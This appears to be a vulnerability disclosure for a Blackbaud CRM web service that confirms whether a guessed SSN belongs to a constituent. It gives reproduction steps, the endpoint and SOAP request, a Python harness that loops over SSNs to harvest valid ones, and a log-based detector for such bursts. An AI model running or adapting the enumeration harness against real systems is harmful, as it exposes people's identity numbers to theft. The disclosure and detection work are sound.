Using Webservices Constituent Search Vulnerability

An authenticated, authorized BBEC user holding only the "General Access" role can call the "Constituent Search (UM Extension)" web service with a Social Security Number as the sole search criterion. When the SSN belongs to a constituent, the service returns that constituent's record, so the endpoint acts as an SSN-validation oracle: repeated queries with guessed SSNs reveal which numbers are real and whose they are.

Download and install the latest patch, which contains all fixes from previous patches. If you are running an older version, download and install the latest version first and then apply the patch.

Steps to reproduce:

1. Log in as a user with the "General Access" role (I don’t know if this is a role we created, or one that came configured with the CRM).

2. POST the following SOAP envelope to the "Constituent Search (UM Extension)" endpoint, /bbappfx/vpp/bizops/db%5BBTP_PROD%5D/searchlists/76d8c79c-b8d4-4349-beb5-283b4bad4285/soap.asmx (the database name and search list ID in the path are those of the environment tested; yours will differ):

   <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:blac="blackbaud_appfx_server_bizops">
      <soapenv:Header/>
      <soapenv:Body>
         <blac:SearchRequest>
            <!--Optional:-->
            <blac:SessionKey>[session key as needed]</blac:SessionKey>
            <!--Optional:-->
            <blac:Criteria>
               <!--Optional:-->
               <blac:SSN>[SSN to test]</blac:SSN>
            </blac:Criteria>
         </blac:SearchRequest>
      </soapenv:Body>
   </soapenv:Envelope>

3. If the SSN belongs to a constituent in the database, the response contains that constituent's record, including identifying information; otherwise no record is returned.

4. Change the SSN (for example, increment it by one, or pick candidates some other way) and repeat the POST. Each response tells the caller whether the guessed SSN is real.
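The four steps above as an added example, not code from the original article or from Blackbaud: it builds the step-2 envelope, classifies each reply as hit or miss (step 3), and loops over incremented SSNs (step 4). Nothing on the page describes the reply format, so the record element name ROW_TAG, the SearchReply wrapper and the field names in the constructed replies are assumptions to be replaced with what the search list's WSDL defines. The transport is passed in as a callable so the loop runs offline here against constructed replies.

```python
"""Harness for the SSN-enumeration steps (added example, not Blackbaud's code).

Assumptions: the reply's SOAP Body carries one ROW_TAG element per matched
constituent; the SearchReply wrapper and field names below are placeholders.
"""
import xml.etree.ElementTree as ET
from typing import Callable, Dict, Iterator, List

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
BIZOPS_NS = "blackbaud_appfx_server_bizops"
ENDPOINT = ("/bbappfx/vpp/bizops/db%5BBTP_PROD%5D/searchlists/"
            "76d8c79c-b8d4-4349-beb5-283b4bad4285/soap.asmx")
ROW_TAG = "Row"  # assumption: tag name of one returned constituent record

ET.register_namespace("soapenv", SOAP_NS)
ET.register_namespace("blac", BIZOPS_NS)


def build_search_request(session_key: str, ssn: str) -> bytes:
    """Serialize the step-2 envelope with SSN as the only search criterion."""
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    ET.SubElement(env, f"{{{SOAP_NS}}}Header")
    body = ET.SubElement(env, f"{{{SOAP_NS}}}Body")
    req = ET.SubElement(body, f"{{{BIZOPS_NS}}}SearchRequest")
    ET.SubElement(req, f"{{{BIZOPS_NS}}}SessionKey").text = session_key
    crit = ET.SubElement(req, f"{{{BIZOPS_NS}}}Criteria")
    ET.SubElement(crit, f"{{{BIZOPS_NS}}}SSN").text = ssn
    return ET.tostring(env, encoding="utf-8", xml_declaration=True)


def parse_search_reply(xml_text: str) -> List[Dict[str, str]]:
    """Step 3: one dict per ROW_TAG element in the Body; an empty list is a miss."""
    body = ET.fromstring(xml_text).find(f"{{{SOAP_NS}}}Body")
    if body is None:
        return []
    return [{c.tag.rsplit("}", 1)[-1]: (c.text or "") for c in el}
            for el in body.iter() if el.tag.rsplit("}", 1)[-1] == ROW_TAG]


def ssn_candidates(start: int, count: int) -> Iterator[str]:
    """Step 4: nine-digit SSNs, incremented by one per request."""
    for n in range(start, start + count):
        yield f"{n:09d}"


def enumerate_ssns(send: Callable[[bytes], str], session_key: str,
                   start: int, count: int) -> Dict[str, List[Dict[str, str]]]:
    """Repeat steps 2-4 over `count` SSNs; keep every one that returned a record."""
    hits: Dict[str, List[Dict[str, str]]] = {}
    for ssn in ssn_candidates(start, count):
        rows = parse_search_reply(send(build_search_request(session_key, ssn)))
        if rows:
            hits[ssn] = rows
    return hits


def hit_rate(hits: Dict[str, object], count: int) -> float:
    """Fraction of guesses that turned out to be real SSNs."""
    return len(hits) / count if count else 0.0


# Constructed stand-in for the service: two of the guessable SSNs "exist".
_FAKE_CONSTITUENTS = {"123456789": ("Jane", "Doe"), "123456791": ("John", "Roe")}


def fake_send(request: bytes) -> str:
    """Offline transport: read the SSN out of the request, answer from the fake table."""
    ssn = ET.fromstring(request).find(f".//{{{BIZOPS_NS}}}SSN").text
    rows = ""
    if ssn in _FAKE_CONSTITUENTS:
        first, last = _FAKE_CONSTITUENTS[ssn]
        rows = (f"<b:{ROW_TAG}><b:FirstName>{first}</b:FirstName>"
                f"<b:LastName>{last}</b:LastName><b:SSN>{ssn}</b:SSN></b:{ROW_TAG}>")
    return (f'<s:Envelope xmlns:s="{SOAP_NS}" xmlns:b="{BIZOPS_NS}">'
            f"<s:Body><b:SearchReply>{rows}</b:SearchReply></s:Body></s:Envelope>")


if __name__ == "__main__":
    found = enumerate_ssns(fake_send, "session-key-here", 123456789, 10)
    print(f"{len(found)} hits in 10 guesses ({hit_rate(found, 10):.0%})")
    for ssn, rows in found.items():
        print(ssn, rows[0].get("FirstName"), rows[0].get("LastName"))
```

Against a live instance, fake_send would be replaced by a function that POSTs the bytes to ENDPOINT over HTTPS with the authenticated session's cookies; whether a SOAPAction header is required, and its value, comes from the WSDL, not from this page.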

An attacker with such an account can automate this: send the request in a loop over candidate SSNs and record every response that returns a record. I was able to get a hit rate of about 2% in my tests, which allowed harvesting of more than 1,200 valid SSNs in around ten minutes.
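Until the patch is applied, the volume described above is the detectable signal: one account issuing searches against the search list endpoint far faster than a person could. The following is an added example, not part of the original article, that reads W3C-format IIS access log lines and flags any (user, minute) pair with more POSTs to a searchlists/.../soap.asmx path than a threshold. The log lines are constructed for the example; the user names, the threshold and the assumption that the web server logs cs-username for authenticated requests are all assumptions.

```python
"""Flag per-user bursts of POSTs to the search list endpoint (added example)."""
import re
from collections import Counter
from typing import Dict, Iterator, Tuple

# Any AppFx search list SOAP endpoint, whatever the database name or list ID.
SEARCHLIST_RE = re.compile(
    r"/bbappfx/vpp/bizops/db%5B[^%]+%5D/searchlists/[0-9a-f-]{36}/soap\.asmx$",
    re.IGNORECASE,
)


def parse_w3c(log_text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per record, using the #Fields: header to name the columns."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed or truncated line; skip rather than misalign columns
        yield dict(zip(fields, parts))


def searchlist_posts_per_minute(log_text: str) -> Counter:
    """Count POSTs to a search list endpoint per (cs-username, yyyy-mm-dd hh:mm)."""
    counts: Counter = Counter()
    for rec in parse_w3c(log_text):
        if rec.get("cs-method") != "POST":
            continue
        if not SEARCHLIST_RE.search(rec.get("cs-uri-stem", "")):
            continue
        minute = f"{rec['date']} {rec['time'][:5]}"
        counts[(rec.get("cs-username", "-"), minute)] += 1
    return counts


def flag_enumeration(log_text: str, threshold: int = 30) -> Dict[Tuple[str, str], int]:
    """Return the (user, minute) pairs whose search count exceeds the threshold."""
    return {key: n for key, n in searchlist_posts_per_minute(log_text).items()
            if n > threshold}


def constructed_log() -> str:
    """Constructed sample: one normal user and one user enumerating SSNs."""
    header = ("#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query "
              "s-port cs-username c-ip sc-status time-taken")
    path = ("/bbappfx/vpp/bizops/db%5BBTP_PROD%5D/searchlists/"
            "76d8c79c-b8d4-4349-beb5-283b4bad4285/soap.asmx")
    lines = [header]
    # alice: three searches spread over ten minutes
    for t in ("09:00:12", "09:04:40", "09:09:03"):
        lines.append(f"2023-01-01 {t} 10.0.0.5 POST {path} - 443 CORP\\alice 10.0.1.20 200 120")
    # mallory: 120 searches inside one minute, two per second
    for i in range(120):
        lines.append(f"2023-01-01 09:05:{i // 2:02d} 10.0.0.5 POST {path} - 443 "
                     f"CORP\\mallory 10.0.1.99 200 95")
    return "\n".join(lines)


if __name__ == "__main__":
    for (user, minute), n in sorted(flag_enumeration(constructed_log()).items()):
        print(f"{minute}  {user}: {n} search list POSTs")
```

The threshold is a starting point, not a finding: tune it against a week of normal traffic, and treat the hit as a lead to pull that session's request bodies (if the application logs them) and confirm the SSN criterion was the one being varied.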

Environment

2.91.1535, patch 36
